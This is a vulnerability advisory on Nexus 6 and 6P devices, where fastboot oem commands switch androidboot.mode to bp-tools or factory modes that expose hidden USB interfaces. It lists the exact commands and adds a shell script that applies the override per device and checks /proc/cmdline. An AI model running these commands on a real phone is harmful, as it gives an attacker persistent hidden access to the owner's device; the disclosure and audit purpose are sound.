Google Nexus 6/6P Custom Boot Modes USB Configs Override

Aleph Research Advisory

Identifier

Severity

High

Products

  1. Nexus 6P

  2. Nexus 6

Vulnerable Versions

  1. Nexus 6 before the January 2017 security patches

  2. Nexus 6P before the January 2017 security patches

Technical Details

The adversary can change the androidboot.mode kernel command line argument, which eventually causes Android to enable hidden USB interfaces with extra functionality. On the Nexus 6 and Nexus 6P, the fastboot UI (which an unauthenticated physical attacker can boot into from the hardware key combination) exposes two proprietary menu items. Selecting either of them, even on a locked bootloader, changes the androidboot.mode argument to bp-tools or to the vendor factory mode (hw-factory on the Huawei-built Nexus 6P, mot-factory on the Motorola-built Nexus 6). An attacker with ADB access, such as PC malware or a malicious charger connected to an ADB-enabled device whose host is already authorized, can also change the bootmode persistently, without touching the device, by issuing the following commands (the device each fastboot oem command applies to is noted beside it):

adb reboot bootloader
fastboot oem config bootmode bp-tools   # Nexus 6
fastboot oem bp-tools-on                # Nexus 6, alternative command
fastboot oem enable-bp-tools            # Nexus 6P
fastboot reboot

Similarly, to make the device boot with hw-factory (Nexus 6P) or mot-factory (Nexus 6), the attacker can issue:

adb reboot bootloader
fastboot oem config bootmode factory    # Nexus 6
fastboot oem enable-hw-factory          # Nexus 6P
fastboot reboot
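
The two override sequences above, as an added example that is not part of the advisory: a POSIX shell script that picks the right fastboot oem command for whichever of the two devices is connected, applies it, and then reads the resulting androidboot.mode back from /proc/cmdline so the change can be confirmed (or, from the defender's side, detected). It assumes the Nexus 6 and Nexus 6P report themselves as shamu and angler to `fastboot getvar product`, that the USB host is already ADB-authorized, and that the factory mode strings are hw-factory (6P) and mot-factory (6); the sample command line is constructed. Nothing touches a device unless the script is run with --apply.

```shell
#!/bin/sh
# Added example for the Aleph Nexus 6/6P bootmode advisory; not the advisory's
# own code. Assumptions: product names shamu (Nexus 6) and angler (Nexus 6P),
# factory modes mot-factory (N6) and hw-factory (N6P), host already ADB-authorized.

# Map a fastboot product name and a desired mode (bp-tools|factory) to the
# vendor-specific oem command listed in the advisory. Prints the command
# (without the leading "fastboot"), or fails for an unsupported product.
oem_cmd_for() {
    product="$1"; mode="$2"
    case "$product:$mode" in
        shamu:bp-tools)  echo "oem config bootmode bp-tools" ;;
        shamu:factory)   echo "oem config bootmode factory" ;;
        angler:bp-tools) echo "oem enable-bp-tools" ;;
        angler:factory)  echo "oem enable-hw-factory" ;;
        *) return 1 ;;
    esac
}

# Extract the value of androidboot.mode=<value> from a kernel command line.
# Prints "normal" when the argument is absent, i.e. a default boot.
bootmode_from_cmdline() {
    for tok in $1; do
        case "$tok" in
            androidboot.mode=*) echo "${tok#androidboot.mode=}"; return 0 ;;
        esac
    done
    echo normal
}

# True (exit 0) when the mode is one that turns on the hidden USB interfaces.
is_hidden_bootmode() {
    case "$1" in
        bp-tools|hw-factory|mot-factory) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample, modelled on /proc/cmdline of a Nexus 6P booted in
# bp-tools mode (the surrounding arguments are an assumption).
SAMPLE_CMDLINE='console=ttyHSL0,115200,n8 androidboot.hardware=angler androidboot.mode=bp-tools androidboot.serialno=0123456789'

# Apply the override to a connected, ADB-authorized device and verify it:
#   ./bootmode.sh --apply bp-tools      (or --apply factory)
if [ "$1" = "--apply" ]; then
    mode="${2:-bp-tools}"
    adb reboot bootloader
    # fastboot getvar waits for the device and prints "product: <name>" on stderr.
    product=$(fastboot getvar product 2>&1 | sed -n 's/^product: *//p')
    cmd=$(oem_cmd_for "$product" "$mode") || { echo "unsupported device: $product" >&2; exit 1; }
    fastboot $cmd
    fastboot reboot
    adb wait-for-device
    current=$(bootmode_from_cmdline "$(adb shell cat /proc/cmdline | tr -d '\r')")
    if is_hidden_bootmode "$current"; then
        echo "device now boots with androidboot.mode=$current (hidden USB interfaces enabled)"
    else
        echo "override did not take effect; androidboot.mode=$current"
    fi
fi
```

The bootmode_from_cmdline check is also the quickest way to audit a device after it has been out of your hands: `adb shell cat /proc/cmdline` (or `adb shell getprop ro.bootmode`, which init derives from the same argument) should report a normal boot, not bp-tools, hw-factory or mot-factory. Because the setting is stored by the bootloader, it survives reboots and a locked bootloader does not clear it.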

Timeline

Posts

Credit